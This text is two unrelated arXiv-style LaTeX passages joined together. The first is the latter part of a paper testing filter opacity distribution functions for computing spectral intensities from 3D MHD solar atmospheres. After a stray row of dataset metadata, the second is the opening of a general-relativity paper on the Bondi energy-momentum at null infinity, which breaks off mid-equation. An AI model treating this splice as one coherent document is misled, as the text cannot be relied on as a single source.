The 3D atmospheric structures utilised for tests in this paper were computed using the radiative MHD code MURaM \citep[][] {2005A&A...429..335V}. The MURaM code was designed for realistic simulations of the stellar upper convection zones and photospheric layers. To this end, the non-ideal MHD equations are numerically solved in a local Cartesian box.
The code includes a non-grey treatment of the energy exchange between matter and radiation, namely the RT is solved independently in four opacity bins \citep[see][for a detailed description]{2005A&A...429..335V}.
In this paper we used the 3D MHD atmospheric structures of \citet[][]{2020ApJ...894..140R} who used the same simulation set-up as in \citet[][]{Rempel2014}.
These simulations use vertical or symmetric lower boundary and a variety of initial magnetic field conditions to enable small-scale dynamo action and obtain various levels of magnetization \citep[see e.g.,][]{2020ApJ...894..140R}. For our studies we chose the case with an initial 300 G vertical magnetic field, that corresponds to the most magnetized cube, in order to cover a broader variety of structures and, thus, provides a better testbed for ODFs and FODFs.
The MHD cubes that we used for our study cover only $1$ Mm above the photosphere.
Although the formation heights of most of the lines lie within the cube, it is not sufficiently high to cover the formation region of some of the UV lines in the spectral region of our interest (see discussion at the end of this section).
Such a poor sampling of the formation region will affect high-resolution calculations and F(ODF)s differently, thus leading to deviations between F(ODF)s and high-resolution calculations which are not introduced by the (F)ODFs approximation.
Therefore, to make sure that our cubes are sufficiently high we extrapolate them upward. We add twenty extra height points above the top surface of the simulation box. At these points, we keep the temperature fixed (to the value of temperature at the top most grid point of the cube before extrapolation), and assign a monotonically outward-decreasing column mass and pressure.
This ad-hoc extrapolation is justifiable since the goal of this paper is not to make a realistic calculations but rather test the (F)ODFs method by comparing it with high resolution computations on the same atmosphere. This extrapolation is used for all the UV results presented in this paper.
We follow the 1.5D approach for calculating the emergent spectrum, i.e., we treat the 1D rays piercing the 3D MHD cube as independent 1D atmospheres. For the vertical rays the temperature, density, pressure and velocity are taken directly from the MURaM grid points, while for the inclined rays these quantities are interpolated.
To solve the RT equation along the ray and to synthesise ODFs and FODFs we employ the newly developed MPS-ATLAS code \citep{2020A&A_Witzke}, which combines an LTE RT solver, with a tool to calculate and pre-tabulate line opacity as well as to create ODFs and FODFs out of them. The MPS-ATLAS builds on the ATLAS9 \citep{Kurucz_manual_1970,Kurucz_2005_Atlas12_9,Castelli_ATLAS12_2005} and the DFSYNTHE \citep{Castelli_2005_DFSYNTHE} codes. For the line opacity the standard Kurucz linelist\footnote{http://kurucz.harvard.edu/linelists/linescd/} is used, and line profiles are described by the Voigt function, except for hydrogen lines which are treated using Stark profiles \citep{SYNTHE_2002_Cowley}.
For solving the RT equation MPS-ATLAS first calculates the equilibrium number densities in LTE for a large set of elements, and molecules. In the next step the continuous opacity is computed, which includes all relevant opacity sources, i.e., free-free and bound-free atomic and molecular transitions, as well as
electron scattering and Rayleigh scattering. Subsequently, line opacity from the pre-tabulated opacity table is read, interpolated, and added. Finally, by using a Feautrier method the RT equation is solved. This is repeated for every frequency point for which the emergent intensity is needed. For more details see \citet{2020A&A_Witzke}.
For applications in solar physics the UV regime is important, at the same time the visible regime is interesting for stellar physicists. In order to represent both the regimes we choose a 10 nm wide spectral pass-band in the UV (294.6 nm-303.4 nm) and in the visible (494.6 nm-503.4 nm). The UV filter profile corresponds to one of the filters in the Sunrise Filter Imager \citep[SuFI, see][]{2011SoPh..268...35G}, while the visible filter is similar to the SuFI filter in profile shape and width, but shifted in wavelength to the blue-green part of the visible solar spectrum. Hereafter we refer to these filter profiles as SuFI and SuFIV for convenience. All the tests performed in this paper use
these exemplary filter profiles and they are shown in Figure~\ref{figure1}.
\section{Results and discussions}
\label{results}
In this section we present the results from the numerical studies that we carried out in order to test the performance of the ODFs and FODFs methods.
Namely, we study the distribution of the errors in the spectral intensities computed using ODFs and FODFs relative to that computed using the high-resolution opacity. For this purpose we used the high-resolution wavelength grid with a resolving power of R=500000.
For the convenience of the discussions we define these relative errors as (see Sect.~\ref{fodfs-method} for definitions of the terms in the right hand sides of the equations below)
$$
e_{\textrm {ODFs}}=(f_{\textrm {HR}}-f_{\textrm {ODFs}})
/f_{\textrm {HR}}\times 100,
$$
that quantifies the accuracy of the ODFs in the rectangular filters,
$$
E_{\textrm {ODFs}}=(F_{\textrm {HR}}-F_{\textrm {ODFs}})/F_{\textrm {HR}}\times 100,
$$
that quantifies the accuracy of the ODFs in the non-rectangular filters, and
$$
E_{\textrm {FODFs}}=(F_{\textrm {HR}}-F_{\textrm {FODFs}})/F_{\textrm {HR}}\times 100,
$$
that quantifies the accuracy of the FODFs.
We calculate all the three quantities for each of the vertical rays piercing the 300 G MHD cube from \citet{2020ApJ...894..140R} and analyze the resulting distributions of the errors.
We note
that we utilise the same approximation of actual velocities by the micro-turbulence for calculating intensities on the high-resolution spectral grid ($F_{\textrm {HR}}$ and $f_{\textrm {HR}}$, see Equations~(\ref{eq:f_quadr})~and~(\ref{eq:F_quadr})) as the one used for calculating intensities with the ODFs and FODFs approaches (i.e., $F_{\textrm {ODFs}}$ and $F_{\textrm {FODFs}}$). We use a micro-turbulent velocity of 0 km/s for the calculations presented in this paper{\bf{, unless specified otherwise}}.
\begin{figure}
\includegraphics[scale=0.4]{f03.eps}
\includegraphics[scale=0.4]{f04.eps}
\caption{Effect of binning.
Plotted are the histograms of $e_{\textrm {ODFs}}$ with intensities computed using one, five and twenty bins in the UV pass-band (294.6 nm-303.4 nm). The Kurucz sub-binning set-up is used. Panels: (a) Histograms of errors introduced by using the GM for computing the ODFs.
(b) The same as for panel (a), but now using the AM for computing the ODFs.
}
\label{figure2}
\end{figure}
\begin{figure}
\includegraphics[scale=0.4]{f05.eps}
\includegraphics[scale=0.4]{f06.eps}
\caption{The same as Figure~\ref{figure2}, but now for the visible pass-band (494.6 nm-503.4 nm). Note that only one and five bin ODFs are considered for this pass-band.
}
\label{figure3}
\end{figure}
\subsection{Effect of binning}
\label{results:binning}
In this section we study $e_{\textrm {ODFs}}$ for various cases defined by the number of bins per filter pass-band, to understand how the number of bins affect the performance of the ODFs. In the original formulation the DFSYNTHE code uses the geometric mean (GM) for averaging the opacity in the sub-bins. To study the effect of different types of the means we test both the GM and the arithmetic mean (AM) here.
In Figures~\ref{figure2} and Figure~\ref{figure3} we show the distribution of $e_{\textrm {ODFs}}$ in the UV and the visible pass-bands, respectively. The calculations are performed with the Kurucz (non-uniform twelve) sub-binning set-up. We note that for the calculation of the ODFs we need to have a sufficient number of the high-resolution grid points in each of the sub-bins. While the wavelength grid in the DFSYNTHE code is sufficiently fine for splitting the UV pass-band in twenty bins, that is not the case for the visible pass-band. Therefore we do not consider the twenty-bin case in the visible pass-band.
In Table~\ref{tab:table1} we list the mean errors in each of the cases plotted in Figures~\ref{figure2}
and \ref{figure3}. We find that the maximum of the absolute mean error of the ODFs method is 1.22 \% in the UV and 0.19 \% in the visible pass-band relative to the high-spectral resolution calculations. Further, we find that in the UV, the absolute mean errors are smaller for the AM than for the GM, while in the visible case they are comparable.
The averaged opacity values computed using the AM are always larger than or equal to those computed using the GM.
Larger opacity values imply that the corresponding radiation is formed in higher layers of the atmosphere. Since the temperature decreases with height for most of the rays we consider, the AM produces lower intensities than the GM.
Therefore, in both the figures we see that the distributions that use the AM are shifted to the
positive side of the horizontal axis.
In order to represent both types of the means hereafter we use the GM for the UV pass-band and the AM for the visible pass-band.
A crucial observation one can make here is that the calculations with one bin are basically as accurate as those with a larger number of bins for both
the UV and the visible pass-bands.
In other words, the intensity computed using 240 (60) frequencies in the UV (visible) is as good as the intensity with twelve frequencies in a spectral pass-band of $\sim$ 10 nm. Thus, we conclude that in narrow spectral pass-bands,
it is sufficient to consider just one bin to reach the intrinsic accuracy of the ODFs method.
Hereafter we continue our studies with one bin per filter unless stated otherwise. The effect of binning on broader spectral pass-bands (i.e., on those where either the Planck function or the continuum opacity substantially changes within the filter) is reserved for future studies.
\subsection{Effect of sub-binning}
\label{results:subbinning}
We now proceed to study $e_{\textrm {ODFs}}$ for various sub-bin configurations to understand the effect of sub-binning.
We note that our goal is not to find an optimal sub-bin configuration as was done by \citet[][]{2019A&A...627A.157C} for 1D spectral synthesis.
Instead we only study a few examples
to demonstrate the effect the sub-binning has on the calculations of the spectral intensities emerging from 3D atmospheres.
In Figure~\ref{figure4} we show the distribution of $e_{\textrm {ODFs}}$ for various cases listed in Table~\ref{tab:table2}.
The different sub-binning configurations we consider are twelve non-uniformly distributed sub-bins as proposed and used by Kurucz, four non-uniformly distributed sub-bins (see below),
and twelve, eight and four unifrmly distributed sub-bins. As already discussed in Section~\ref{fodfs-method}, the non-uniform sub-bins should have a coarser division near lower values of opacity and a finer division near the larger values. The configurations using four non-uniform sub-bins are chosen from the study of \citet[][]{2019A&A...627A.157C} (their best configuration at 300 nm, 500 nm and 503 nm). Two of these configurations used in the visible pass-band have a finer division near large opacity values (purple and black lines in Figure~\ref{figure4}b) than the one used in the UV (purple lines in Figure~\ref{figure4}a).
In the UV (Figure~\ref{figure4}a) we observe a two peak distribution of $e_{\textrm {ODFs}}$.
The peak near zero is highest for Kurucz sub-binning whereas for the uniform sub-binning cases the highest peak appears at larger errors. In the visible pass-band (Figure~\ref{figure4}b) we see a single peak for all the cases. Here the performance of two sub-binning configurations from \citet[][]{2019A&A...627A.157C} comes very close to that of the Kurucz sub-binning.
For both the UV and the visible pass-bands the performance of the ODFs method deteriorates as the number of sub-bins used in the uniform sub-binning cases decreases. This is because it leads to coarser division of the sub-bins near the larger opacity values. Among all the various cases the Kurucz sub-binning case performs the best in both the UV and the visible pass-bands.
These examples, computed on a large number of atmospheric structures, re-affirm the findings of \citet[][]{2019A&A...627A.157C} that the accuracy of the ODFs is sensitive to the non-uniformity of the sub-bins, in particular near larger opacity values.
\begin{figure}
\includegraphics[scale=0.4]{f07.eps}
\includegraphics[scale=0.4]{f08.eps}
\caption{Effect of sub-binning when using a single bin to compute the ODFs for the two considered spectral pass-bands.
Plotted are the histograms of $e_{\textrm {ODFs}}$ for one-bin and various combination of the sub-bin sizes $s_j$ listed in Table~\ref{tab:table2}. Panels: (a) The UV pass-band. (b) The visible pass-band.
}
\label{figure4}
\end{figure}
\subsection{Performance of FODFs}
\label{result:fodfs_performance}
In this section we study the perfomance of the FODFs method for computing intensities passing through non-rectangular filters. For this purpose we use the filter profiles SuFI and SuFIV (see their description at the end of Section~\ref{1.5D-RT}).
In Figure~\ref{figure5} we show the distributions of $e_{\textrm {ODFs}}$, $E_{\textrm {ODFs}}$ and
$E_{\textrm {FODFs}}$ in the UV and the visible pass-bands. The $e_{\textrm {ODFs}}$ and $E_{\textrm {FODFs}}$ distributions in general look very similar. Their respective mean values are also similar, namely, in the UV pass-band they are -1.2 \% and -1.4 \% while in the visible pass-band they are 0.19 \% and 0.14 \%.
This implies that the performance of the FODFs method for intensities passing through non-rectangular filters is as good as that of the traditional ODFs method for intensity passing through rectangular filters. This is not surprising since the entire idea of the FODFs method is to mimic the performance of the ODFs method for non-rectangular filters. Indeed, the FODFs method essentially boils down to the ODFs method but performed on a modified frequency grid (see Equation~\ref{eq:tilda} and discussion in Section~\ref{fodfs-method}). The mean of the $E_{\textrm {ODFs}}$ distribution in the UV and the visible pass-bands are -4.6\% and -0.56\% respectively. It is clear from Figure~\ref{figure5} (blue and red curve) that the FODFs method performs better than the ODFs method for computation of the intensities passing through the non-rectangular filters.
One way to improve the performance of the ODFs method for calculating intensities through the non-rectangular filters is to increase the number of bins in the pass-band of the filter. For a sufficiently large number of bins, one can neglect the change of the transmission function within the bin and the $F_{\textrm {ODFs}}$ becomes a good approximation of the $F_{\textrm{HR}}$. An example of the improved performance of ODFs is demonstrated in Figure~\ref{figure55} where we show $E_{\textrm {ODFs}}$ computed using five bins and compare them with
$E_{\textrm {FODFs}}$ computed using one bin.
Now the mean of the $E_{\textrm {ODFs}}$ ($E_{\textrm {FODFs}}$) distribution in the SuFI and the SuFIV filters are -1.9\% (-1.4\%) and -0.16\% (-0.14\%) respectively. This shows that the performance of ODFs, indeed, improves (compare blue lines in Figures \ref{figure5} and \ref{figure55}) and almost approaches the performance of FODFs (although is still a bit worse).
However, this implies that RT calculations have to be performed on five times larger number of frequencies which increases the computational costs by five times. The FODFs method is free from such a shortcoming and thus, is five times faster than the traditional ODFs method.
In Figures~\ref{map-flux-HR-fodf-sufi}
and \ref{map-flux-HR-fodf-visible} we show the images of the emergent spectral intensities on the entire 300 G cube in the UV and the visible pass-bands respectively. In each of these figures shown are the intensities computed using high-spectral resolution case and the FODFs method. These figures show that the FODFs method is accurate enough to reproduce the important spatial structuring reflected in the images of the intensities.
To visualize the error distribution
we show the images of the $E_{\textrm {FODFs}}$ in Figure~\ref{map-err-HR-fodf} for the UV and the visible pass-bands. A comparison of the images of intensities in Figures~\ref{map-flux-HR-fodf-sufi}
and \ref{map-flux-HR-fodf-visible} with the error maps in Figure~\ref{map-err-HR-fodf} indicates that they have a striking structural correlation in the UV while in the visible pass-band the correlation is weak.
In the UV pass-band the magnitude of the errors is higher in the brighter granular structures and lower in darker inter-granular structures, while in the visible pass-band they are nearly uniform. In particular in the UV pass-band the individual errors can be as high as -6.5\%.
We note that a detailed study of the source of these individual large errors is beyond the scope of this paper.
However, as already discussed above the mean errors are much smaller. This is because the large individual errors occur only at certain grid points and do not dominate the distribution.
\begin{figure}
\includegraphics[scale=0.4]{f09.eps}
\includegraphics[scale=0.4]{f10.eps}
\caption{Performance of FODFs. Plotted are the histograms of $e_{\textrm {ODFs}}$, $E_{\textrm {ODFs}}$ and $E_{\textrm {FODFs}}$ for the one-bin set-up with the Kurucz sub-binning. Panels: (a) The SuFI filter. (b) The SuFIV filter.
}
\label{figure5}
\end{figure}
\begin{figure}
\includegraphics[scale=0.4]{f11.eps}
\includegraphics[scale=0.4]{f12.eps}
\caption{Performance of FODFs. Plotted are the histograms of $E_{\textrm {ODFs}}$ for the five-bins set-up and $E_{\textrm {FODFs}}$ for the one-bin set-up with the Kurucz sub-binning. Panels: (a) The SuFI filter. (b) The SuFIV filter.
}
\label{figure55}
\end{figure}
\begin{figure}
\includegraphics[scale=0.55]{f13.eps}
\includegraphics[scale=0.55]{f14.eps}
\caption{Images of the spectral intensities seen through SuFI filter for the one-bin set-up with the Kurucz sub-binning. Panels: (a) High-spectral resolution intensity. (b) Intensity computed using the FODFs method.
}
\label{map-flux-HR-fodf-sufi}
\end{figure}
\begin{figure}
\includegraphics[scale=0.55]{f15.eps}
\includegraphics[scale=0.55]{f16.eps}
\caption{Images of the spectral intensity seen through SuFIV filter for the one-bin set-up with the Kurucz sub-binning. Panels: (a) High-spectral resolution intensity. (b) Intensity computed using the FODFs method.
}
\label{map-flux-HR-fodf-visible}
\end{figure}
\begin{figure}
\includegraphics[scale=0.55]{f17.eps}
\includegraphics[scale=0.55]{f18.eps}
\caption{Images of the $E_{\textrm {FODFs}}$ with intensities computed using one-bin and the Kurucz sub-binning set-up. Panels: (a) For SuFI filter. (b) For SuFIV filter.
}
\label{map-err-HR-fodf}
\end{figure}
{\bf{
\begin{figure}
\includegraphics[scale=0.4]{f19.eps}
\includegraphics[scale=0.4]{f20.eps}
\caption{Effect of micro-turbulent velocity ${\rm{v}}$. Plotted are the histograms of $E_{\textrm {FODFs}}$ for the one-bin set-up and the Kurucz sub-binning with ${\rm{v}}$ values 0 and 2 km/s. Panels: (a) The SuFI filter. (b) The SuFIV filter.
}
\label{figure5AB}
\end{figure}
Since the main goal of the paper is to validate the method of FODFs by comparing with the high resolution solutions and the solutions using ODFs, for all the studies until now we simply chose the micro-turbulent velocity value to be 0 km/s as an example. In Figure~\ref{figure5AB} we illustrate the effect of micro-turbulent velocity ${\rm{v}}$ on the distributions of $E_{\textrm {FODFs}}$ in the UV and the visible pass-bands. We compare the $E_{\textrm {FODFs}}$ for ${\rm{v}}$ values of 0 km/s and 2 km/s. The respective mean values of $E_{\textrm {FODFs}}$ for ${\rm{v}}=$ 0 km/s and 2 km/s are, -1.4 \% and -1.25 \% in the UV pass-band while in the visible pass-band they are 0.14 \% and 0.23 \%. Thus the use of non-zero micro-turbulent velocity values leads to slightly smaller errors in the UV and slightly larger errors in the visible pass-bands.
}}
\subsection{Center-to-limb Variation}
\label{clv}
In the previous sections we only considered the radiation along vertical rays. In this section we consider rays at nine inclinations equally spaced in $\mu$ between $\mu=0.2$ and 1, where $\mu=\cos \theta$ and $\theta$ is the angle between the ray and the normal vector. For each of the rays we spatially average the emergent spectral intensities. We show this center-to-limb variation of the spatially averaged intensities passing through the SuFI and the SuFIV filters in the top panels of Figure~\ref{figure9}. The two curves in each of these panels are computed with high-spectral resolution and with the FODFs method. In the bottom panels we plot the $E_{\textrm {FODFs}}$ between the two intensities plotted in the top panels.
Figure~\ref{figure9} shows that the absolute relative errors of intensity values are below 1.4\% in the SuFI filter and below 0.19\% in the SuFIV filter. An accurate calculation of the center-to-limb intensity variations is essential for the characterization of exoplanets from transit light curves. We note, that the transit light curves do not depend on the offset in the intensity values (i.e., error independent of $\mu$) so that only the change of the error with $\mu$ has an effect on exoplanet characterization. One can see that the errors brought about by the usage of FODFs show a rather weak dependence on the $\mu$ value: in the SuFI filter the absolute relative error increases towards disk-center, while in the SuFIV filter the error decreases towards the disk-center. The change in the error in Figure~\ref{figure9} between $\mu=0.2$ and $\mu=1$ is only 0.36 \% in the SuFI and 0.018 \% in the SuFIV filter.
\begin{figure}
\includegraphics[scale=0.4]{f21.eps}
\includegraphics[scale=0.4]{f22.eps}
\caption{In the top panels we plot the center-to-limb variation of the spatially averaged emergent spectral intensities computed using high-spectral resolution (solid lines) and the FODFs method (dotted lines) through non-rectangular filters, while in the bottom panels the corresponding $E_{\textrm {FODFs}}$ are plotted. These calculations correspond to one-bin set-up with Kurucz sub-binning. Panels: (a) The SuFI filter. (b) The SuFIV filter.
}
\label{figure9}
\end{figure}
\section{Conclusions}
\label{conclusions}
In this paper we have tested the performance of the ODFs method for calculating spectral intensities emerging from 3D cubes representing solar atmospheres. We show that ODFs return accurate values of intensities and their centre-to-limb variations. We also demonstrate that sub-bin configurations which were found to be good for simple 1D models also work well for the 3D case.
Furthermore, we have generalised the ODFs concept for calculating intensities in narrow-band non-rectangular filters, introducing filter-ODFs or FODFs. We recall here that by narrow band filters we mean the filters narrow enough that neither the continuum opacity nor the Planck function changes noticeably within it. Further we recall that the rectangular filter refers to the one which is zero outside of the given spectral pass-band and has a constant value within this pass-band.
We have implemented this method in the MPS-ATLAS code and tested it rigorously.
By formulation the FODFs method is identical to the traditional ODFs method but with a change-of-variable for integration.
The main advantage of the FODFs method is that the intensities in the narrow band non-rectangular filters can be computed in just one wavelength bin (or interval) with the intrinsic accuracy of the traditional ODFs method in rectangular filters. We analyzed our FODFs method using two non-rectangular filters (i.e., one in the UV and the other in the visible pass-band). In both the cases the FODFs method does an excellent job. Due to its advantage in terms of its speed and accuracy, this method finds its applicability in studies of stellar variability and exo-planet detection and characterization, population synthesis of stars in galaxies.
As next steps we would like to extend our studies to broader spectral pass-bands and test the performance of the method for stars with various effective temperatures. In particular, we will find the optimal setups of FODFs for calculating intensities in pass-bands routinely used in the ground based photometry (e.g. in Str\"omgen and Johnson-Morgan pass-band) as well as in the space-borne photometry (e.g., in pass-bands of {\it {Kepler}}, TESS, CHEOPS, and Gaia telescopes).
We expect that our method will be useful for a broad range of applications demanding calculations of intensity in spectral pass-bands, e.g. stellar colours, photometric variability of the Sun and stars, stellar limb darkening in pass-bands of transit-photometry telescopes (which is crucial for the determination of exoplanet radii), etc. At the same time our approach is not suitable for the synthesis of the individual line profiles.
\acknowledgements{The research leading to this paper has received funding from the European Research Council under the European Union’s Horizon 2020 research and innovation program (grant agreement No. 715947). It also got financial support from the BK21 plus program through the National Research Foundation (NRF) funded by the Ministry of Education of Korea. The computational resources were provided by the German Data Center for SDO through
grant 50OL1701 from the German Aerospace Center (DLR).
This work was partially supported from ERC Synergy Grant WHOLE SUN 810218.}
| 2024-02-18T23:40:20.114Z | 2021-04-29T02:13:48.000Z | algebraic_stack_train_0000 | 2,091 | 8,655 |
|
proofpile-arXiv_065-10243 | \section{Introduction}
\label{sec:introduction}
One of the main achievements in the theoretical development of Einstein's theory of gravity was the discovery that a gravitating system may lose energy through the emission of gravitational waves. The famous ``mass-loss formula'' was derived by H.~Bondi and his group in 1962~\cite{Bondi:1962} in the axisymmetric case and shortly after by R.~Sachs in the general case~\cite{Sachs:1962a}. The main consequence of the mass-loss formula is the proof that --- provided that Einstein's theory is correct --- gravitational waves must exist, nowadays an experimentally well established fact~\cite{Abbott:2016,Abbott:2016a,Abbott:2017,Abbott:2017a}.
The mass-loss formula involves two quantities, the energy flux due to gravitational waves and the total mass of the system in question. By their very nature these quantities are defined at infinity where the global properties of a space-time reside. The energy flux measures the intensity of the gravitational radiation carried by the waves in each direction away from the system at each instant of time. The total mass of the system depends on time and is computed by a surface integral of the mass aspect over the sphere of all outgoing directions at an instant of retarded time.
Obviously, the Bondi mass and the gravitational flux are crucially important quantities describing --- at least in part --- a gravitationally active system. However, it is not straightforward to ``measure'' these quantities. Clearly, the description above implies that the Bondi mass is a global quantity which resides at infinity. But things are even more complicated. The Bondi mass is computed from the components of the Bondi-Sachs energy-momentum, a 4-covector defined on a cut of null infinity. Physically speaking, a cut is the idealised spherical surface of instants in retarded time when observers distributed in all directions at infinite distance from the system measure the gravitational wave signal. This information provides the so called \emph{mass-aspect} on the cut and the Bondi-Sachs 4-momentum is obtained by integrating the mass-aspect against four functions defined on the cut which can be interpreted in some sense as translations. This is in line with the fact that energy and momentum are associated in physics with translational symmetries~\cite{Ashtekar:1981}.
In the mathematical treatment of the situation there is some gauge freedom in the description of null infinity and in all discussions of the Bondi energy-momentum this freedom was used to simplify the description as much as possible. The freedom in the description consists of essentially three types, the choice of coordinates, the choice of a frame and the choice of a conformal factor, when the approach is based on Penrose's conformal treatment of asymptotically flat space-times~\cite{Penrose:1965}. When these simplifying choices are made then the resulting formulae for the Bondi energy-momentum are deceptively simple. However, when one approaches null infinity in a way which is not in line with these simplifying assumptions then the simple formulae are no longer valid. But this is exactly the situation which one is facing when space-times are computed numerically using codes which are capable of reaching null infinity in finite time such as the codes based on the characteristic formulations of the Einstein equations \cite{Bishop:1997,Winicour:2001} or the conformal field equations~\cite{Hubner:1996a,Hubner:2001a,Frauendiener:1998,Frauendiener:1998a,Frauendiener:2002c,Frauendiener:2004}. In these cases, the gauge is dictated by the formulation of the equations which makes the numerical treatment as well-behaved as possible and this is, in general, not the same as the choices needed for simplifying the treatment of null infinity.
In this paper we give a prescription for the determination of the Bondi energy-momentum in a general gauge. This is an important task not only because of the physical relevance of the Bondi mass but also because the Bondi-Sachs mass-loss formula is a very good test for the validity of a numerical code.
The outline of the paper is as follows. In sec.~\ref{sec:asympt-flatn-struct} we collect the necessary facts about null infinity following the standard sources such as e.g.~\cite{Penrose:1986,Frauendiener:2004a,Geroch:1977,ValienteKroon:2016}. Sec.~\ref{sec:conf-ghp-form} is devoted to the introduction of a manifestly conformally invariant formalism based on conformal densities. This formalism is an extension of the more familiar GHP formalism~\cite{Geroch:1973b,Penrose:1984a}. It is used in sec.~\ref{sec:cut-systems-null} and \ref{sec:bms-algebra} to study the structure of cut systems of $\mathscr{I}$ and of the BMS algebra and, in particular, to derive and characterize the ideal of asymptotic translations in sec.~\ref{sec:lorentz-metric-space}. Finally, in sec.~\ref{sec:mass-aspect} we discuss the Bondi energy-momentum and prove (again) the mass-loss formula for gravitational radiation in asymptotically flat space-times in sec.~\ref{sec:mass-loss-formula}. We finish the paper with a brief description of how one would use the formulae obtained earlier to compute the Bondi energy-momentum in a space-time for which null infinity is not presented in a Bondi gauge.
We use the same conventions and notation as~\cite{Penrose:1986} throughout.
\section{Asymptotic flatness and the structure of null infinity}
\label{sec:asympt-flatn-struct}
In this section we will briefly outline the specific assumptions that are made in the definition of the Bondi energy-momentum. We describe this not from a point of view within the physical space-time but from within a conformally related space-time. We are interested here in an asymptotically flat space-time $(\widetilde{M},\tilde{g}_{ab})$. By definition, this means that we may regard $\widetilde{M}$ as embedded into a larger `unphysical' space-time $(M,g_{ab})$ where the metrics are related on $\widetilde{M}$ by
\begin{equation}
\label{eq:1}
g_{ab} = \Omega^2\tilde{g}_{ab}
\end{equation}
for a function $\Omega:M\to{\mathbb {R}}$ with $\Omega(x)>0$ if and only if $x\in\widetilde{M}$. We denote the zero-set of $\Omega$ by $\mathscr{I}$, usually called \emph{null infinity}, and assume that it is a regular submanifold of $M$ so that $\mathscr{I}=\{x \in M : \Omega(x)=0, \mathrm{d}\Omega(x) \ne0\}$. Notice, that the conformal factor $\Omega$ is not unique, any function $\widehat\Omega=\Omega\Theta$ with $\Theta>0$ on $\widetilde{M}\cup\mathscr{I}$ together with the metric $\hat{g}_{ab}=\Theta^2 g_{ab}$ satisfies the same conditions. We assume that $\mathscr{I}$ has two connected components $\mathscr{I}=\mathscr{I}^+ \cup \mathscr{I}^-$ each with the topology $S^2\times {\mathbb {R}}$, see~\cite{Geroch:1977,Penrose:1965,Frauendiener:2004} for more details. The sets $\mathscr{I}^\pm$ are called \emph{future} and \emph{past null infinity}. In what follows we will implicitly assume that $\mathscr{I}$ refers to $\mathscr{I}^+$. Similar considerations hold for $\mathscr{I}^-$.
The curvature tensors of the two metrics differ by terms containing derivatives of the conformal factor $\Omega$. The various pieces of the Riemann tensors, i.e., the Weyl tensor $C_{abc}{}^d$, the tensor $\Phi_{ab}=-\frac12 (R_{ab}- \frac14 R g_{ab})$, defined in terms of the Ricci tensor $R_{ab}$, and the curvature scalar $\Lambda=\frac1{24}R$, are related on $\widetilde{M}$ according to the formulae
\begin{equation}
\label{eq:2}
\begin{aligned}
\widetilde{C}_{abc}{}^d &= C_{abc}{}^d \\
\Omega\widetilde{\Phi}_{ab} &= \Omega\Phi_{ab} + \nabla_a\nabla_b\Omega - \frac14 g_{ab} \Box\Omega,\\
\tilde\Lambda &= \Omega^2\Lambda - \frac14 \Omega \Box \Omega + \frac12 \nabla_a\Omega \nabla^a\Omega.
\end{aligned}
\end{equation}
We assume that the vacuum Einstein equations hold in $\widetilde{M}$ near $\mathscr{I}$. Thus, the physical Einstein tensor $\widetilde{G}_{ab}$ vanishes and so does the physical Ricci tensor $\widetilde{R}_{ab}$. Hence, the equations
\begin{equation}
\label{eq:3}
\begin{aligned}
0 &= \Omega\Phi_{ab} + \nabla_a\nabla_b\Omega - \frac14 g_{ab} \Box\Omega,\\
0 &= \Omega^2\Lambda - \frac14 \Omega \Box \Omega + \frac12 \nabla_a\Omega \nabla^a\Omega
\end{aligned}
\end{equation}
hold on $\widetilde{M}$. Since all geometric quantities are smooth these equations extend smoothly to $\mathscr{I}$ and we can write them in the form
\begin{align}
\nabla_a\nabla_b\Omega - \frac14 g_{ab} \Box\Omega &= \mathcal{O}(\Omega), \label{eq:4}\\
\nabla_a\Omega \nabla^a\Omega &= \mathcal{O}(\Omega).\label{eq:5}
\end{align}
The first of these equations is termed the \emph{asymptotic Einstein condition} in~\cite{Penrose:1986} while the second equation shows that $\mathscr{I}$ is a regular null hyper-surface. A fundamental consequence of this construction is that the Weyl tensor vanishes on $\mathscr{I}$. This allows us to introduce the rescaled Weyl quantities $\psi_i=\Omega^{-1}\Psi_i$ for $i=0:4$, smooth complex valued functions on $M$, where $\Psi_i$ are components of $C_{abc}{}^d$ with respect to the null tetrad. For their definition, as for the definition of all the spin-coefficients etc we refer to~\cite{Penrose:1984a}.
As the next step we collect all the equations on $\mathscr{I}$ that are relevant. We write them down with respect to a null tetrad which is chosen as follows. The metric $g_{ab}$ when restricted to $\mathscr{I}$ is degenerate i.e., at every point on $\mathscr{I}$ there is a 1-dimensional subspace of tangent vectors which kill the metric. Let $n^a$ be a non-zero vector in that subspace. We complement it by a complex null vector $m^a$ and an additional real null vector $l^a$ to a null tetrad $(n^a,m^a,\overline{m}^a,l^a)$ for $M$ at every point on $\mathscr{I}$. The dual (co-vector) basis is $(l_a,-\overline{m}_a,-m_a,n_a)$. In most of what follows we will be concerned only with quantities which are intrinsic to $\mathscr{I}$. The corresponding basis and dual basis intrinsic to $\mathscr{I}$ are obtained by dropping the last members of the 4-dimensional bases.
To simplify things and in view of later discussions we now assume the existence of a scalar function $s:\mathscr{I}\to{\mathbb {R}}$ with the property that $D's=n^a\nabla_as\ne0$ everywhere and we assume that the complex null vector $m^a$ has been chosen so that $\delta s = m^a\nabla_a s=0$. Then, the level sets of constant $s$ are ``cuts'' of $\mathscr{I}$, i.e., 2-dimensional surfaces everywhere transverse to its null generators, i.e., the integral curves to $n^a$.
With this setup we are now in a position to introduce the GHP-formalism~\cite{Geroch:1973b,Penrose:1984a} and, in particular, the operators $\thorn'$, $\eth$ and $\etp$ acting in the directions of the basis vectors tangent to $\mathscr{I}$.
The gradient of the conformal factor $\Omega$ on $M$ defines a vector field\footnote{Note, that the sign makes the vector future-pointing on $\mathscr{I}^+$. On $\mathscr{I}^-$ one would have a different sign.} $N^a:=-g^{ab}\nabla_b\Omega$ which, when restricted to $\mathscr{I}$ is null, i.e., such that $N^a=An^a$ for some scalar $A$ on $\mathscr{I}$. When the conformal factor is changed by a rescaling $\Omega \mapsto \Theta \Omega$ then both $g_{ab}$ and $N^a$ are changed, $g_{ab} \mapsto \Theta^2\,g_{ab}$ and $N^a\mapsto \Theta^{-1}N^a$, but the tensor
\begin{equation}
\Gamma_{ab}{}^{cd} := g_{ab} N^cN^d\label{eq:6}
\end{equation}
